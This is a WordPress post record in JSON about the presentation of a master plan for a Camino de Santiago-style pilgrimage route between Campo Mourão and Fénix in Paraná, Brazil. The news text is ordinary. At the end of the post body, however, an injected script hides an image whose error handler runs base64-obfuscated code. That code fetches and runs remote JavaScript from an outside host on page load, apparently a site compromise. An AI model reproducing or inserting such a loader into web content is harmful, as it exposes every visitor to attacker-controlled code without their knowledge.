{"id":13870,"date":"2023-07-10T10:42:53","date_gmt":"2023-07-10T13:42:53","guid":{"rendered":"https:\/\/nubesmgzdigital.com.ar\/?p=13870"},"modified":"2025-08-13T16:14:54","modified_gmt":"2025-08-13T19:14:54","slug":"entrega-del-plan-director-del-primer-camino-iniciatico-al-camino-de-santiago-en-parana","status":"publish","type":"post","link":"https:\/\/nubesmgzdigital.com.ar\/index.php\/2023\/07\/10\/entrega-del-plan-director-del-primer-camino-iniciatico-al-camino-de-santiago-en-parana\/","title":{"rendered":"Entrega del plan director del primer camino Inici\u00e1tico al Camino de Santiago en Paran\u00e1"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#044c75\"><em>Masiva asistencia de autoridades y agentes socioecon\u00f3micos\u00a0del\u00a0Estado.<\/em><\/h3>\n\n\n\n<p>El d\u00eda jueves 06 de julio se present\u00f3 en Curitiba, capital del Estado de Paran\u00e1, el plan director del Camino Inici\u00e1tico al Camino de Santiago entre Campo Mour\u00e3o y F\u00e9nix, proyecto pionero de la asociaci\u00f3n que se viene trabajando con el destino desde diciembre del a\u00f1o pasado.<\/p>\n\n\n\n<p>A la presentaci\u00f3n, asistieron el vicegobernador de Paran\u00e1 Darci Piana, cuatro secretarios de Estado de las \u00e1reas involucradas, instituciones vinculadas, el diputado estadual de turismo, alcaldes de los Municipios de Paran\u00e1 por donde transcurrir\u00e1 el Camino Inici\u00e1tico, universidades y una amplia representaci\u00f3n de la Iglesia de Brasil y de la Di\u00f3cesis de Campo Mour\u00e3o con presencia del Chanceler y responsables de distintos grupos religiosos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-1024x683.jpg\" alt=\"\" class=\"wp-image-13872\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-1024x683.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-300x200.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-768x512.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-1536x1024.jpg 1536w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-2048x1365.jpg 2048w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-696x464.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-1068x712.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/vice_governador-cam.santiago_de_compostela-06-07-23_46-630x420.jpg 630w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Vice governador em reuni\u00e3o sobre caminho inici\u00e1tico de santiago de compostela.Fotos: Ari Dias\/AEN<\/figcaption><\/figure>\n\n\n\n<p>El presidente de Asicotur, Alejandro Rubin present\u00f3 este plan que contempla cuatro l\u00edneas estrat\u00e9gicas y 60 acciones que deber\u00e1n ser puestas en pr\u00e1ctica por los municipios para que este camino se convierta en una r\u00e9plica del Camino de Santiago en Europa. La intervenci\u00f3n, fue complementada por el CEO de la Consultora que lo ejecut\u00f3, Tono Mugico, quien habl\u00f3 de la infraestructura necesaria, de los 271 puntos de mejora identificados a lo largo del camino, las condiciones de seguridad y servicios b\u00e1sicos de alojamiento, adem\u00e1s de otros productos y servicios tur\u00edsticos necesarios para su \u00e9xito.<\/p>\n\n\n\n<p>Destac\u00f3 la presencia de la ex- Gobernadora Cida Borghetti y numerosos invitados entre los que se encontraba la Asociaci\u00f3n Paraenense de Amigos de Santiago de Compostela, miembros de la Orden del Camino y el delegado de Asicotur en Brasil, Rub\u00e9n Orlando Moyano.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos-1024x683.jpg\" alt=\"\" class=\"wp-image-13871\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos-1024x683.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos-300x200.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos-768x512.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos-696x464.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos-1068x712.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos-630x420.jpg 630w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/Foto-Plan-Caminhos-inciaticos.jpg 1500w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Todos los que han intervenido han destacado las expectativas que tienen en la puesta en marcha de este proyecto para el que aportar\u00e1n los recursos necesarios para dinamizar este itinerario que pasa zonas rurales que necesitan desarrollo.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Masiva asistencia de autoridades y agentes socioecon\u00f3micos\u00a0del\u00a0Estado. El d\u00eda jueves 06 de julio se present\u00f3 en Curitiba, capital del Estado de Paran\u00e1, el plan director del Camino Inici\u00e1tico al Camino de Santiago entre Campo Mour\u00e3o y F\u00e9nix, proyecto pionero de la asociaci\u00f3n que se viene trabajando con el destino desde diciembre del a\u00f1o pasado. A [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":13873,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[114,113],"tags":[],"class_list":["post-13870","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-destinos","category-internacional"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/13870","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=13870"}],"version-history":[{"count":2,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/13870\/revisions"}],"predecessor-version":[{"id":19509,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/13870\/revisions\/19509"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media\/13873"}],"wp:attachment":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=13870"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/categories?post=13870"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/tags?post=13870"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}